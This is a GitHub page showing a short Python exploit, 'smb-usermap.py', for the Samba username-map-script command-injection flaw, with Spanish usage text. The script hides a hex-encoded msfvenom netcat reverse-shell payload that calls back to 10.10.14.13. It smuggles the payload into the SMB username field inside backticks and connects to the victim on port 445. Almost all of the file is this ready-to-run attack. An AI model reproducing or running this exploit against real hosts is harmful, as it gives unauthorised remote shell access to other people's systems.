-
Notifications
You must be signed in to change notification settings - Fork 0
/
smb-usermap.py
32 lines (26 loc) · 1.05 KB
/
smb-usermap.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/python3
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
if len(sys.argv) < 2:
print ("\nUso: python3 " + sys.argv[0] + " <IP-Victima>\n")
sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=IP-LOCAL LPORT=445 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x72"
buf += "\x77\x6a\x63\x64\x68\x3b\x20\x6e\x63\x20\x31\x30\x2e"
buf += "\x31\x30\x2e\x31\x34\x2e\x31\x33\x20\x34\x34\x35\x20"
buf += "\x30\x3c\x2f\x74\x6d\x70\x2f\x72\x77\x6a\x63\x64\x68"
buf += "\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f"
buf += "\x74\x6d\x70\x2f\x72\x77\x6a\x63\x64\x68\x20\x32\x3e"
buf += "\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x72"
buf += "\x77\x6a\x63\x64\x68"
username = "/=` nohup " + buf + "`"
password = ""
con = SMBConnection(username, password, "HACK" , "F", use_ntlm_v2 = False)
assert con.connect(sys.argv[1], 445)
# smb-usermap.py <IP victima>
# Referencia - https://www.exploit-db.com/exploits/16320/